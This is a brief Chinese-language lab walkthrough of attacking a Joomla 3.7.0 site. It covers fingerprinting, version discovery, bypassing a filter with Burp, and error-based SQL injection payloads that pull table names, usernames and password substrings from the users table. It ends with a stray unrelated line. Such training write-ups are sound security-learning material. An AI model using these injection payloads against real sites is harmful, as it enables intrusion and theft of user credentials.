一.信息收集
打开靶场的第一步就是信息收集,看网站的端口,系统,语言,中间件,指纹(cms),服务,等等。
打开御剑识别网站指纹为joomla
漏洞库搜索漏洞
下载Joomla源码解压vs搜索查看版本
根据vs版本路径访问到xml文件找到版本3.7.0
根据版本再去搜索相关漏洞
根据找到的sql注入 漏洞,输入测试有限制
bp抓包重放修改传参方法利用脏数据绕过
查询表名
/(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1)),1)
利用burp添加正则爆破模块爆破出表名
爆破表名
(0x23,concat(0x7e,(select username from #__users limit 0,1)),1)
密码显示长度不同需要截取字符串
(0x23,concat(0x7e,(select substr(password,1,30)from #_users limit 0,1),0x7e),1)
—————————————— 最不愿见到的…所谓的恋人吧?